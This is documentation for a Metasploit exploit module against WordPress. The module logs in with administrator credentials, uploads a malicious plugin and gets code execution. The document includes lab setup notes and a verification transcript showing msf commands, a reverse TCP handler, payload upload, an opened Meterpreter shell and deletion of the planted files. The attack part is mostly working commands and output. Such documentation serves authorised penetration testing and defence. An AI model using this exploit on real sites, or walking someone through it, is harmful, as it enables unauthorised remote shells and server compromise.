James Lee
1.8 KiB
1.8 KiB
Vulnerable Application
This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Becuase this is authenticated code execution by design, it should work on all versions of WordPress.
Vulnerable Application Installation
You can get WordPress from https://wordpress.org/download/ or from some Linux package managers. Debian maintains an installation guide that also works on Ubuntu. Note that in a default install of WP from apt, the plugins directory is owned by root, so unless you chown it to the web user, this module will not work. Doing so is common in real-world deployments to allow legitimate administrators to install plugins, so it is not unreasonable for your own installation.
Verification steps
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php
meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >